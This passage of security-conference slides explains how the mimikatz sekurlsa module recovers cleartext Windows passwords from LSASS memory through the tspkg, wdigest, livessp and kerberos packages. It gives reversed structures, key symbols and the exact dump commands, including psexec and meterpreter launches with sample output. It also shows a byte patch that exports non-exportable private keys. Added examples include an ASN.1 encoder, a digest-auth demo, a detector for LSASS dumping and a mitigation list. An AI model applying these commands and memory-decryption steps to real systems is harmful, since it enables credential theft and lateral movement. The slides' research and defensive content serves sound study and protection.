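To make the ASN.1 point above concrete, here is an added example (my own code, not part of the original slides or of mimikatz) that encodes and decodes a TSPasswordCreds SEQUENCE the way MS-CSSP defines it: three OCTET STRINGs, each wrapped in an explicit context tag [0], [1], [2], carrying UTF-16LE text. The domain, user and password values are constructed for the example, and the function names (`encode_ts_password_creds`, `decode_ts_password_creds`, `contains_cleartext_password`) are my own. The last check shows why the slide concludes that the password must reside in memory: nothing in this structure can be built from a hash, so a client that delegates default credentials has to hold the cleartext.

```python
"""TSPasswordCreds (MS-CSSP 2.2.1.2.1) DER encoder/decoder. Added example, not from the slides."""


def _der_length(n: int) -> bytes:
    """DER length octets: short form below 128, long form (0x80 | count, then big-endian) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, content: bytes) -> bytes:
    """Tag-Length-Value wrapper."""
    return bytes([tag]) + _der_length(len(content)) + content


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, content, next_pos) for the TLV starting at pos; reject truncated input."""
    tag = buf[pos]
    first = buf[pos + 1]
    pos += 2
    if first & 0x80:
        count = first & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    else:
        length = first
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated DER element")
    return tag, buf[pos:end], end


FIELDS = ("domainName", "userName", "password")  # context tags [0], [1], [2]


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """Build the DER SEQUENCE a CredSSP client delegates to the server.

    Each field is an OCTET STRING (0x04) inside an explicit context tag
    (0xA0 | n), and the text is UTF-16LE, as MS-CSSP specifies.
    """
    parts = []
    for idx, value in enumerate((domain, user, password)):
        octets = _tlv(0x04, value.encode("utf-16-le"))
        parts.append(_tlv(0xA0 | idx, octets))
    return _tlv(0x30, b"".join(parts))


def decode_ts_password_creds(blob: bytes) -> dict:
    """Parse the structure back into a dict; raises ValueError on malformed input."""
    tag, body, end = _read_tlv(blob, 0)
    if tag != 0x30 or end != len(blob):
        raise ValueError("expected a single DER SEQUENCE")
    creds, pos = {}, 0
    while pos < len(body):
        ctag, inner, pos = _read_tlv(body, pos)
        if (ctag & 0xE0) != 0xA0:  # constructed, context-specific class
            raise ValueError("expected explicit context tag")
        idx = ctag & 0x1F
        if idx >= len(FIELDS):
            raise ValueError("unknown field tag [%d]" % idx)
        otag, octets, _ = _read_tlv(inner, 0)
        if otag != 0x04:
            raise ValueError("expected OCTET STRING inside [%d]" % idx)
        creds[FIELDS[idx]] = octets.decode("utf-16-le")
    return creds


def contains_cleartext_password(blob: bytes, password: str) -> bool:
    """True when the delegated blob carries the password verbatim (it always does: no hashing is applied)."""
    return password.encode("utf-16-le") in blob


# Constructed sample values for the example (not from any real system)
SAMPLE = ("LAB", "alice", "S3cret-pass")

if __name__ == "__main__":
    blob = encode_ts_password_creds(*SAMPLE)
    print(blob.hex())
    print(decode_ts_password_creds(blob))
    print("password in clear inside blob:", contains_cleartext_password(blob, SAMPLE[2]))
```

Only the TLS channel protects this blob on the wire; on the client, the provider has to keep the password to produce it, which is the defender's reason for limiting "Default credentials" delegation to the hosts that really need it.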
mimikatz :: sekurlsa :: tspkg :: symbols & theory
Let's explore some symbols
– sounds cool… (thanks Microsoft)
Let's imagine a scenario
– Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  • TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials…
    kd> x tspkg!*clear*
    75016d1c tspkg!TSObtainClearCreds = <no type information>
    kd> x tspkg!*password*
    75011b68 tspkg!TSDuplicatePassword = <no type information>
    75011cd4 tspkg!TSHidePassword = <no type information>
    750195ee tspkg!TSRevealPassword = <no type information>
    75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
    kd> x tspkg!*locate*
    7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg :: workflow
[Workflow diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable → KIWI_TS_CREDENTIAL → pTsPrimary → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
        PVOID unk0;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Password;
    } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_TS_CREDENTIAL {
    #ifdef _M_X64
        BYTE unk0[108];
    #elif defined _M_IX86
        BYTE unk0[64];
    #endif
        LUID LocallyUniqueIdentifier;
        PVOID unk1;
        PVOID unk2;
        PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
    } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg :: demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest :: what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]" – Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios – Authenticated client access to a Web site – Authenticated client access using SASL – Authenticated client access with integrity protection to a directory service using LDAP" – Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
– No password over the network, just hashes
– No reversible password in Active Directory: hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI[…])
Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon
The WDigest provider must keep the elements needed to compute responses for different servers
– Username
– Realm (from server)
– Password
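As an added example (my own code, not from the slides or from mimikatz), here is the RFC 2617 arithmetic the slide refers to, run against two realms. The `DigestClient` and `DigestServer` classes are hypothetical models I wrote for the illustration: the server side stores only per-realm HA1 values (the "Advanced Digest" idea of the previous slide), and the client side is tried once holding the cleartext password and once holding a single precomputed HA1. Sample values are the RFC 2617 section 3.5 example plus a second realm I constructed. The result shows why a client-side provider that must answer an unknown realm ends up retaining the password rather than a hash.

```python
"""Digest access authentication (RFC 2617) arithmetic. Added example, not from the slides."""
import hashlib
from typing import Dict, Optional


def md5hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password): the only place the password enters, and it depends on the realm."""
    return md5hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth (the slide's "[…]" covers the auth-int body hash)."""
    return md5hex(f"{method}:{digest_uri}")


def digest_response(h1: str, nonce: str, method: str, uri: str,
                    nc: Optional[str] = None, cnonce: Optional[str] = None,
                    qop: Optional[str] = None) -> str:
    """Response computed from a precomputed HA1; with qop it is MD5(HA1:nonce:nc:cnonce:qop:HA2)."""
    h2 = ha2(method, uri)
    if qop:
        return md5hex(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")
    return md5hex(f"{h1}:{nonce}:{h2}")


class DigestClient:
    """Hypothetical model of what a client-side provider retains to answer challenges."""

    def __init__(self, username: str, password: Optional[str] = None,
                 known_ha1: Optional[Dict[str, str]] = None):
        self.username = username
        self.password = password                 # cleartext, as WDigest keeps it
        self.known_ha1 = dict(known_ha1 or {})   # realm -> HA1, if precomputed

    def answer(self, realm: str, nonce: str, method: str, uri: str, **qop_args) -> Optional[str]:
        """Return the response, or None when the realm is unknown and no password is held."""
        h1 = self.known_ha1.get(realm)
        if h1 is None:
            if self.password is None:
                return None
            h1 = ha1(self.username, realm, self.password)
        return digest_response(h1, nonce, method, uri, **qop_args)


class DigestServer:
    """Hypothetical Advanced-Digest-style server: stores per-realm HA1 per user, never the password."""

    def __init__(self, realm: str, ha1_by_user: Dict[str, str]):
        self.realm = realm
        self.ha1_by_user = ha1_by_user

    def verify(self, username: str, nonce: str, method: str, uri: str,
               response: str, **qop_args) -> bool:
        h1 = self.ha1_by_user.get(username)
        if h1 is None:
            return False
        return digest_response(h1, nonce, method, uri, **qop_args) == response


# Sample values: RFC 2617 section 3.5 example, plus a second realm constructed for this example
USER, PASSWORD = "Mufasa", "Circle Of Life"
NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"
METHOD, URI = "GET", "/dir/index.html"
QOP = dict(nc="00000001", cnonce="0a4f113b", qop="auth")
REALM_A, REALM_B = "testrealm@host.com", "other.example"


def demo() -> Dict[tuple, bool]:
    """Map (client kind, realm) -> whether the server accepted the client's answer."""
    server_a = DigestServer(REALM_A, {USER: ha1(USER, REALM_A, PASSWORD)})
    server_b = DigestServer(REALM_B, {USER: ha1(USER, REALM_B, PASSWORD)})
    full = DigestClient(USER, password=PASSWORD)
    ha1_only = DigestClient(USER, known_ha1={REALM_A: server_a.ha1_by_user[USER]})
    results = {}
    for kind, client in (("password", full), ("ha1_only", ha1_only)):
        for server in (server_a, server_b):
            resp = client.answer(server.realm, NONCE, METHOD, URI, **QOP)
            results[(kind, server.realm)] = resp is not None and server.verify(
                USER, NONCE, METHOD, URI, resp, **QOP)
    return results


if __name__ == "__main__":
    for key, accepted in demo().items():
        print(key, "accepted" if accepted else "rejected")
```

The server can verify with a stored HA1, but the client holding only one realm's HA1 cannot log in to the second server; the provider that must work everywhere keeps the password, which is exactly the memory the talk goes looking for.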
mimikatz :: sekurlsa :: wdigest :: theory
This time we know
– that WDigest keeps the password in memory « by protocol » for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– SpAcceptCredentials takes the clear password in its args
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the doubly linked list wdigest!l_LogSessList
    .text:7409D151 _DigestCalcHA1@8          call    dword ptr [eax+0B4h]
    .text:74096C69 _SpAcceptCredentials@16   call    dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
[Workflow diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_WDIGEST_LIST_ENTRY {
        struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
        struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
        DWORD UsageCount;
        struct _KIWI_WDIGEST_LIST_ENTRY *This;
        LUID LocallyUniqueIdentifier;
        […]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
        […]
    } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching
~ Boring ~… let's be more brutal this time: make a WinDBG trap
    0: kd> !process 0 0 lsass.exe
    PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
        DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
        Image: lsass.exe
    0: kd> .process /i 83569040
    You need to continue execution (press 'g' <enter>) for the context
    to be switched. When the debugger breaks in again, you will be in
    the new process context.
    0: kd> g
    Break instruction exception - code 80000003 (first chance)
    nt!RtlpBreakWithStatusInstruction:
    814b39d0 cc              int     3
    0: kd> .reload /user
    Loading User Symbols
    0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
    0: kd> g
mimikatz :: sekurlsa :: livessp :: how?
Let's log in with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Call stacks caught by the LsaProtectMemory breakpoint (kc 5):

    lsasrv!LsaProtectMemory
    livessp!LiveMakeSupplementalCred
    livessp!LiveMakeSecPkgCredentials
    livessp!LsaApLogonUserEx2
    livessp!SpiLogonUserEx2
        ← Our LiveSSP provider

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials
        ← Yeah, Pass the Hash capability with Live account too…

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials
        ← Live user can log on through RDP via SSO

    1: kd> uf /c livessp!LsaApLogonUserEx2
    livessp!LsaApLogonUserEx2 (74781536)
      […]
      livessp!LsaApLogonUserEx2+0x560 (74781a96):
        call to livessp!LiveCreateLogonSession (74784867)
mimikatz :: sekurlsa :: livessp :: workflow
[Workflow diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_LIVESSP_LIST_ENTRY {
        struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
        struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
        DWORD unk4;
        DWORD unk5;
        PVOID unk6;
        LUID LocallyUniqueIdentifier;
        LSA_UNICODE_STRING UserName;
        PVOID unk7;
        PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
    } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

    typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
        DWORD isSupp;
        DWORD unk0;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's log in with a normal account
After credentials protection, KerbCreateLogonSession calls
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
Call stacks caught by the LsaProtectMemory breakpoint (kc 5):

    lsasrv!LsaProtectMemory
    kerberos!KerbHideKey
    kerberos!KerbCreatePrimaryCredentials
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials
        ← Kerberos ticket part? Maybe ;)

    lsasrv!LsaProtectMemory
    kerberos!KerbHidePassword
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials
        ← Kerberos part for the password

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    wdigest!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow
[Workflow diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
        DWORD unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
    #ifdef _M_X64
        BYTE unk4[32];
    #elif defined _M_IX86
        BYTE unk4[20];
    #endif
        LUID LocallyUniqueIdentifier;
    #ifdef _M_X64
        BYTE unk5[44];
    #elif defined _M_IX86
        BYTE unk5[36];
    #endif
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow
[Workflow diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_KERBEROS_LOGON_SESSION {
        struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
        struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
        DWORD UsageCount;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        DWORD unk3;
        DWORD unk4;
        PVOID unk5;
        PVOID unk6;
        PVOID unk7;
        LUID LocallyUniqueIdentifier;
    #ifdef _M_IX86
        DWORD unk8;
    #endif
        DWORD unk9;
        DWORD unk10;
        PVOID unk11;
        DWORD unk12;
        DWORD unk13;
        PVOID unk14;
        PVOID unk15;
        PVOID unk16;
        […]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: "hu?"
OK, it works…
But why?
Not at every logon on NT5 (an unlock may be needed)
From my understanding of Microsoft's explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logic…
– For password auth
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on client
  • No hash on client
  – NTLM hash on client…
  – KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) into the LSASS process to take advantage of its keys when we called it
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the keys LSASS initialized
– When we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT5
Depending on the size of the secret, LsaEncryptMemory uses
– RC4
– DESx
[Diagram: NT5 protection keys, read from lsasrv inside the lsass process and copied into mimikatz: g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8])]
mimikatz :: sekurlsa :: LsaEncryptMemory :: NT6
Depending on the size of the secret, LsaEncryptMemory uses
– 3DES
– AES
[Diagram: NT6 protection keys, read from lsasrv inside the lsass process and copied into mimikatz: InitializationVector (BYTE[16]), h3DesKey and hAesKey (pointers to KIWI_BCRYPT_KEY)]

    typedef struct _KIWI_BCRYPT_KEY_DATA {
        DWORD size;
        DWORD tag;
        DWORD type;
        DWORD unk0;
        DWORD unk1;
        DWORD unk2;
        DWORD unk3;
        PVOID unk4;
        BYTE data;   /* etc. */
    } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

    typedef struct _KIWI_BCRYPT_KEY {
        DWORD size;
        DWORD type;
        PVOID unk0;
        PKIWI_BCRYPT_KEY_DATA cle;
        PVOID unk1;
    } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo
Security Packages
Protection Keys
    Package        | Symbols                                                 | Type
    ---------------+---------------------------------------------------------+---------------------
    tspkg          | tspkg!TSGlobalCredTable                                 | RTL_AVL_TABLE
    wdigest        | wdigest!l_LogSessList                                   | LIST_ENTRY
    livessp        | livessp!LiveGlobalLogonSessionList                      | LIST_ENTRY
    kerberos (nt5) | kerberos!KerbLogonSessionList                           | LIST_ENTRY
    kerberos (nt6) | kerberos!KerbGlobalLogonSessionTable                    | RTL_AVL_TABLE
    msv1_0         | lsasrv!LogonSessionList / lsasrv!LogonSessionListCount  | LIST_ENTRY / ULONG

    Key  | NT 5 Symbols
    -----+------------------------------------------
    RC4  | lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
    DESx | lsasrv!g_pDESXKey, lsasrv!g_Feedback

    Key  | NT 6 Symbols
    -----+----------------------------
         | lsasrv!InitializationVector
    3DES | lsasrv!h3DesKey
    AES  | lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:

    mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
    mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
    // http://blog.gentilkiwi.com/mimikatz

    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

    mimikatz # sekurlsa::logonPasswords full

    Authentification Id         : 0;234870
    Package d'authentification  : NTLM
    Utilisateur principal       : Gentil Kiwi
    Domaine d'authentification  : vm-w8-rp-x
            msv1_0 :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
             * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
            kerberos :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Mot de passe : waza1234
            wdigest :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Mot de passe : waza1234
            tspkg :
             * Utilisateur  : Gentil Kiwi
             * Domaine      : vm-w8-rp-x
             * Mot de passe : waza1234
            livessp : n.t. (LUID KO)
mimikatz sekurlsa: what we can do?

Basics
- No physical access to computer (first step to pass the hash, then pass the pass)
- No admin rights, system rights, debug privileges (...)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless :))
- For privileged accounts, network login instead of interactive (when possible)
- Audit: pass the hash keeps traces and can lock accounts
- No admin rights, system rights, debug privileges, even for VIPs
- Use a separated network (or forest) for privileged tasks

More in depth
- Force strong authentication (SmartCard & Token) $ €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
- Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
- Leave opportunities to stop retro compatibility
- Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
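The "Audit" point above is the one a defender can act on right away: a sekurlsa-style dump needs SeDebugPrivilege and a read handle on lsass.exe, and both leave a record. The following is an added example (not code from the slides or from mimikatz) that runs two such detections over constructed sample records; it assumes the field names of Security event 4703 (user right adjusted: ProcessName, EnabledPrivilegeList) and Sysmon event 10 (process access: SourceImage, TargetImage, GrantedAccess), and the allow-lists are illustrative placeholders to be tuned per environment.

```python
"""Detection example added here (not code from Benjamin Delpy's slides or from
mimikatz): two traces a sekurlsa-style LSASS credential dump leaves in Windows
logs, run over constructed sample records.

Assumed: Security event 4703 carries ProcessName and EnabledPrivilegeList, and
Sysmon event 10 carries SourceImage, TargetImage and GrantedAccess. The records
and allow-lists below are constructed for this example."""
import re

PROCESS_VM_READ = 0x0010  # access right needed to read another process' memory

# Illustrative allow-lists (constructed): processes expected to enable
# SeDebugPrivilege or to open lsass.exe with read access on a given build.
DEBUG_PRIV_ALLOWED = {r"c:\windows\system32\svchost.exe"}
LSASS_READERS_ALLOWED = {r"c:\windows\system32\csrss.exe",
                         r"c:\windows\system32\wininit.exe"}

# Constructed sample records, one per line, space separated key=value pairs.
SAMPLE_EVENTS = """\
EventID=4703 SubjectUserName=gentilkiwi ProcessName=C:\\Windows\\System32\\svchost.exe EnabledPrivilegeList=SeDebugPrivilege
EventID=4703 SubjectUserName=gentilkiwi ProcessName=C:\\tools\\mimikatz.exe EnabledPrivilegeList=SeDebugPrivilege
EventID=10 SourceImage=C:\\tools\\mimikatz.exe TargetImage=C:\\Windows\\system32\\lsass.exe GrantedAccess=0x1010
EventID=10 SourceImage=C:\\Windows\\system32\\csrss.exe TargetImage=C:\\Windows\\system32\\lsass.exe GrantedAccess=0x1fffff
EventID=10 SourceImage=C:\\Windows\\system32\\svchost.exe TargetImage=C:\\Windows\\system32\\lsass.exe GrantedAccess=0x1000
"""


def parse_event(line):
    """Turn 'k=v k=v' into a dict (values in these samples contain no spaces)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_suspicious(ev):
    """Return a reason if the record matches either detection, else None."""
    eid = ev.get("EventID")
    if eid == "4703" and "SeDebugPrivilege" in ev.get("EnabledPrivilegeList", ""):
        proc = ev.get("ProcessName", "").lower()
        if proc not in DEBUG_PRIV_ALLOWED:
            return f"SeDebugPrivilege enabled by {proc}"
    if eid == "10" and ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        access = int(ev.get("GrantedAccess", "0"), 16)
        src = ev.get("SourceImage", "").lower()
        # Only a handle that includes PROCESS_VM_READ can be used to read secrets.
        if access & PROCESS_VM_READ and src not in LSASS_READERS_ALLOWED:
            return f"{src} opened lsass.exe with read access (0x{access:x})"
    return None


def scan(text):
    """Return [(line_number, reason)] for every suspicious record in text."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        reason = is_suspicious(parse_event(line))
        if reason:
            hits.append((n, reason))
    return hits


if __name__ == "__main__":
    for n, reason in scan(SAMPLE_EVENTS):
        print(f"line {n}: {reason}")
```

On the sample data only the two mimikatz.exe records are flagged: the svchost.exe privilege adjustment is allow-listed and the 0x1000 handle carries no read right. The same logic applies to a driver-based dump only partially, since the handle event disappears; that case is covered by the "no admin rights, no debug privilege" points rather than by this rule.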
mimikatz crypto: what is it?

A little module that I wrote to
- play with Windows Cryptographic API, CNG and RSA keys
- automate export of certificates/keys
  • Even those which are "not" exportable

What crypto module can do
- List
  • Providers
  • Stores
  • Certificates
  • Keys
- Export
  • Certificates
    - public, in DER format
    - with private keys, in PFX format
  • Private keys in PVK format
    - it's cool, OpenSSL can deal with it too
- Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again!)
mod_mimikatz_crypto

mimikatz crypto: how it's protected?

Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  • At least without the master keys and/or password of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
- Yes, a computer/server opens a "session"
Export/Usage can be limited by
- Password
- Popup
- Export/Archive flag not present

(Password and Popup: constraint for most users; unavailable for computer keys)
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto capi: how it works?

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." - http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere...) load some DLL to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
- cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys by this API...
mimikatz crypto capi: how it's exported? ( level)

(diagram: Process -> CryptoAPI and RSA CSP: Ask to export Key -> DPAPI Decode -> Load Private Key -> Exportable? yes -> Exported Key; no -> NTE_BAD_KEY_STATE; "PLAYSKOOL")
mimikatz crypto patchcapi: because I own my process

When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
        Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

(diagram annotation: Exportable?)
mimikatz crypto patchcapi: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:

.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
